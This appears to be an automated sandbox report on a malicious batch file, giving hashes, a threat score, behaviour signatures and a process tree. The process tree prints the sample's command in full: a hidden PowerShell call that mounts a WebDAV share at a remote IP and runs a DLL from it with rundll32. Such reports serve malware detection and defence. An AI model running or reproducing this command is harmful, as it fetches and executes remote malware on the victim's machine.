Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14-07-2024 21:29
Static task
static1
Behavioral task
behavioral1
Sample
23968317472171130400.bat
Resource
win7-20240708-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
23968317472171130400.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
23968317472171130400.bat
-
Size
2KB
-
MD5
6ae5ea6cf69b9ddfd182826f1c9670c2
-
SHA1
64f786bb941d2dd49f3600b9882f01c3fee0bcb4
-
SHA256
8fb11a4140916bc1f5ea9bdb9723236bb019561c7db4d0948ae18120640b2dcb
-
SHA512
cc731a576c7a3d20b4cd57139ed0f9f3296ad409dfcc6b102fb2aa61452d448c0d0f3a5edd191150a6ab771225c739442a71a42be88091f21a5faa05b405b44e
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2076 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2076 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2600 wordpad.exe 2600 wordpad.exe 2600 wordpad.exe 2600 wordpad.exe 2600 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2308 wrote to memory of 2600 2308 cmd.exe 31 PID 2308 wrote to memory of 2600 2308 cmd.exe 31 PID 2308 wrote to memory of 2600 2308 cmd.exe 31 PID 2308 wrote to memory of 2076 2308 cmd.exe 32 PID 2308 wrote to memory of 2076 2308 cmd.exe 32 PID 2308 wrote to memory of 2076 2308 cmd.exe 32 PID 2076 wrote to memory of 2900 2076 powershell.exe 34 PID 2076 wrote to memory of 2900 2076 powershell.exe 34 PID 2076 wrote to memory of 2900 2076 powershell.exe 34 PID 2076 wrote to memory of 2768 2076 powershell.exe 35 PID 2076 wrote to memory of 2768 2076 powershell.exe 35 PID 2076 wrote to memory of 2768 2076 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\23968317472171130400.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\305.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2900
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\305.dll entry3⤵PID:2768
-
-